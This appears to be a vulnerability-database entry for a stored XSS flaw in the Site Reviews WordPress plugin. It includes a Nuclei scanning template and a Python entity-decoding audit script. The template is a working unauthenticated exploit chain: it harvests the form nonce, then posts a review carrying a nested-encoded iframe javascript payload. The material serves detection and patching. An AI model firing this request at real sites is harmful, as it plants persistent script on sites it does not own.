
Site Reviews < 7.2.5 - Unauthenticated Stored XSS

CVE-2025-1232
Verified

Description

The Site Reviews WordPress plugin before 7.2.5 contains a stored cross-site scripting vulnerability caused by improper sanitization and escaping of review fields, which lets unauthenticated users execute malicious scripts. Exploitation requires no authentication.

Severity

High

CVSS Score

8.8

Exploit Probability

21%

Affected Product

site-reviews

Published Date

February 9, 2026

Template Author

0x_akoko

CVE-2025-1232.yaml
id: CVE-2025-1232

info:
  name: Site Reviews < 7.2.5 - Unauthenticated Stored XSS
  author: 0x_Akoko
  severity: high
  description: |
    Site Reviews WordPress plugin before 7.2.5 contains a stored cross-site scripting caused by improper sanitization and escaping of review fields, letting unauthenticated users execute malicious scripts, exploit requires no authentication.
  impact: |
    Unauthenticated users can execute malicious scripts in the context of site visitors, potentially leading to session hijacking or defacement.
  remediation: |
    Update to version 7.2.5 or later.
  reference:
    - https://wpscan.com/vulnerability/c4ea8357-ddd7-48ac-80c9-15b924715b14/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-1232
    - https://research.cleantalk.org/cve-2025-1232/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2025-1232
    epss-score: 0.20938
    epss-percentile: 0.95713
    cwe-id: CWE-79
    cpe: cpe:2.3:a:geminilabs:site-reviews:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: geminilabs
    product: site-reviews
    shodan-query: http.component:"WordPress"
    fofa-query: body="site-reviews" || body="glsr-form"
  tags: cve,cve2025,wordpress,wp,wp-plugin,site-reviews,xss,stored

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wp/v2/pages?per_page=100"

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, 'glsr-form-wrap')
        condition: and
        internal: true

    extractors:
      - type: regex
        name: honeypot
        group: 1
        regex:
          - 'display:none[\s\S]{0,500}?name=\\"site-reviews\[([a-f0-9]{8})\]\\"'
        internal: true

      - type: regex
        name: post_id
        group: 1
        regex:
          - 'name=\\"site-reviews\[_post_id\]\\"[\s\S]{0,5}?value=\\"([^\\"]*)\\"'
        internal: true

      - type: regex
        name: form_id
        group: 1
        regex:
          - 'name=\\"site-reviews\[form_id\]\\"[\s\S]{0,5}?value=\\"([^\\"]*)\\"'
        internal: true

      - type: regex
        name: terms_exist
        group: 1
        regex:
          - 'name=\\"site-reviews\[terms_exist\]\\"[\s\S]{0,5}?value=\\"([^\\"]*)\\"'
        internal: true

      - type: regex
        name: nonce
        group: 1
        regex:
          - 'name=\\"site-reviews\[_nonce\]\\"[\s\S]{0,5}?value=\\"([^\\"]*)\\"'
        internal: true

      - type: regex
        name: form_signature
        group: 1
        regex:
          - 'name=\\"site-reviews\[form_signature\]\\"[\s\S]{0,5}?value=\\"([^\\"]*)\\"'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        action=glsr_public_action&_ajax_request=true&site-reviews%5B_action%5D=submit-review&site-reviews%5B_nonce%5D={{nonce}}&site-reviews%5B_post_id%5D={{post_id}}&site-reviews%5B_referer%5D=&site-reviews%5Bassigned_posts%5D=&site-reviews%5Bassigned_terms%5D=&site-reviews%5Bassigned_users%5D=&site-reviews%5Bexcluded%5D=&site-reviews%5Bform_id%5D={{form_id}}&site-reviews%5Bterms_exist%5D={{terms_exist}}&site-reviews%5Bform_signature%5D={{form_signature}}&site-reviews%5B{{honeypot}}%5D=&site-reviews%5Brating%5D=5&site-reviews%5Btitle%5D=Great+Service&site-reviews%5Bcontent%5D=%26amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Blt%3Biframe+src%3Djavascript%3Aalert%28document.domain%29%26amp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bamp%3Bgt%3B&site-reviews%5Bname%5D=TestReviewer&site-reviews%5Bemail%5D=reviewer%40example.com&site-reviews%5Bterms%5D=1

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - 'javascript:alert(document.domain)'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d1259e89a19d6587ef78a46675fe2d299d002303c7fded19f0a502c24caccc3b022100e4d3427dc331d3c358c3ddd09ece8179f4726e7849579bde1dca1203edd308ab:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVE ID: CVE-2025-1232
CWE ID: CWE-79

References

https://wpscan.com/vulnerability/c4ea8357-ddd7-48ac-80c9-15b924715b14/
https://nvd.nist.gov/vuln/detail/CVE-2025-1232
https://research.cleantalk.org/cve-2025-1232/

Remediation Steps

Update to version 7.2.5 or later.
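
An added example (not part of the template or of the plugin's code): the content value in the template's POST request keeps its angle brackets under nested entity encoding, so a filter that inspects only the raw string sees no tag. This Python check for auditing stored review fields decodes to a fixed point before looking for markup; the function names, the 16-pass cap and the sample strings are assumptions constructed here.

```python
import html
import re

MAX_ROUNDS = 16  # assumed cap on decoding passes; input that needs more is flagged

# An opening or closing HTML tag, which a plain-text review field should never contain.
TAG = re.compile(r"<\s*/?\s*[a-zA-Z][^<>]*>")

# Constructed samples. LAYERED copies the nesting of the template's content
# parameter ("&" + eight "amp;" + "lt;") around a harmless iframe.
LAYERED = ("&" + "amp;" * 8 + "lt;iframe src=about:blank"
           + "&" + "amp;" * 8 + "gt;")
BENIGN = "Fish &amp; chips were great, 5 stars"
TOO_DEEP = "&" + "amp;" * 20 + "lt;b&" + "amp;" * 20 + "gt;"


def decode_to_fixed_point(value, max_rounds=MAX_ROUNDS):
    """Unescape HTML entities until the string stops changing.

    Returns (decoded, rounds, settled); settled is False when the cap was
    reached while the string was still changing.
    """
    rounds = 0
    while rounds < max_rounds:
        decoded = html.unescape(value)
        if decoded == value:
            return value, rounds, True
        value, rounds = decoded, rounds + 1
    return value, rounds, html.unescape(value) == value


def audit_review_field(value):
    """Report how many encoding layers a field has and whether a tag emerges."""
    decoded, layers, settled = decode_to_fixed_point(value)
    tag_after = bool(TAG.search(decoded))
    return {
        "layers": layers,
        "tag_in_raw": bool(TAG.search(value)),
        "tag_after_decoding": tag_after,
        "flag": tag_after or not settled,  # undecodable depth is itself suspicious
    }


if __name__ == "__main__":
    for name, sample in (("layered", LAYERED), ("benign", BENIGN),
                         ("too_deep", TOO_DEEP)):
        print(name, audit_review_field(sample))
```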